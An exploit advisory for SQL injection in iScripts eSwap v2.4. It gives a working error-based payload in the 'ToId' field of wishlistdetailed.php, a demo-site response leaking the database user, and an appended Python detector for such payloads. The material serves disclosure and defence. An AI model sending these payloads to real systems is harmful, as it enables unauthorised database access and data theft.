Exploit title: iScripts eSwap v2.4 - SQL injection via the wishlistdetailed.php User Panel
Date: 22/05/2018
Exploit Author: Keyone
Vendor Homepage: https://www.iscripts.com
Software Link: https://www.iscripts.com/eswap
Demo Link: https://www.demo.iscripts.com/eswap/demo//index.php
Version: 2.4
Tested on: Windows 7
Category: Webapps
CVE:
Description
iScripts eSwap v2.4 is vulnerable to SQL injection via the "ToId" parameter of "wishlistdetailed.php" in the User Panel.
POC: 'ToId' parameter
Request:
POST /eswap/demo/wishlistdetailed.php?type=wish HTTP/1.1
Host: www.demo.iscripts.com
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36
Accept: */*
DNT: 1
Referer: https://www.demo.iscripts.com/eswap/demo/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: __utmc=227100805; __utmz=227100805.1526871632.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=csv8f9jgmjl6sh1spblmikbra0; messagesUtk=4f44605715d9c930d9c1241135f98fbf; __utma=129714457.1643618766.1526980257.1526980257.1526980257.1; __utmc=129714457; __utmz=129714457.1526980257.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=227100805.862283.1526871632.1526871632.1526980259.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 171
btnGo=Send%20Message&btnSubAdd=1&msgId=1&qyery=type=wish&ToId=1' and (select updatexml(1,concat(0x2b,user()),1))+and '1'='1&txtMsg=1&txtMsg70=1&txtTitle=1&txtTitle70=Mr.
Response:
HTTP/1.1 200 OK
Date: Tue, 22 May 2018 11:28:39 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 18898
...
</div></div>
<div class="col-lg-9">
<div>
XPATH syntax error: '+productd_dmouser@localhost'
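As an added example that is not part of this advisory, the following Python detector is run over the POST body and the response fragment quoted above: it flags the error-based injection primitive used in the POC (MySQL updatexml()/extractvalue() wrapped around concat()) in URL-decoded form fields and extracts the value that the server disclosed through its XPATH error message. The regexes and the benign comparison body are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Constructed samples: the POST body and the response fragment quoted in the advisory.
ADVISORY_BODY = (
    "btnGo=Send%20Message&btnSubAdd=1&msgId=1&qyery=type=wish"
    "&ToId=1' and (select updatexml(1,concat(0x2b,user()),1))+and '1'='1"
    "&txtMsg=1&txtMsg70=1&txtTitle=1&txtTitle70=Mr."
)
ADVISORY_RESPONSE = "<div>\nXPATH syntax error: '+productd_dmouser@localhost'\n"
BENIGN_BODY = "btnGo=Send%20Message&btnSubAdd=1&msgId=7&ToId=42&txtMsg=hi&txtTitle=Mr."

# MySQL error-based SQLi primitives: updatexml()/extractvalue() raise an XPATH error
# that echoes the injected expression (here user()) back inside the HTTP response.
ERROR_BASED_FUNCS = re.compile(r"\b(updatexml|extractvalue)\s*\(", re.IGNORECASE)
# String tautology used to close the injected condition, e.g.  and '1'='1
QUOTED_TAUTOLOGY = re.compile(r"\b(and|or)\s+'[^']*'\s*=\s*'", re.IGNORECASE)
# MySQL surfaces the leaked value inside the quotes of this error text.
XPATH_LEAK = re.compile(r"XPATH syntax error: '([^']*)'")

def suspicious_params(body):
    """Map parameter name -> URL-decoded value for every field carrying an
    error-based SQLi indicator. '+' decodes to a space, as the server would."""
    hits = {}
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            if ERROR_BASED_FUNCS.search(value) or QUOTED_TAUTOLOGY.search(value):
                hits[name] = value
    return hits

def leaked_via_xpath_error(response_body):
    """Return the value a MySQL XPATH error disclosed, or None if the response is clean."""
    match = XPATH_LEAK.search(response_body)
    return match.group(1) if match else None

if __name__ == "__main__":
    print("flagged fields:", suspicious_params(ADVISORY_BODY))
    print("benign fields:", suspicious_params(BENIGN_BODY))
    print("leaked value:", leaked_via_xpath_error(ADVISORY_RESPONSE))
```

Pairing the request-side match with the XPATH error in the response gives a high-confidence signal that the injection executed, not merely that a payload was sent.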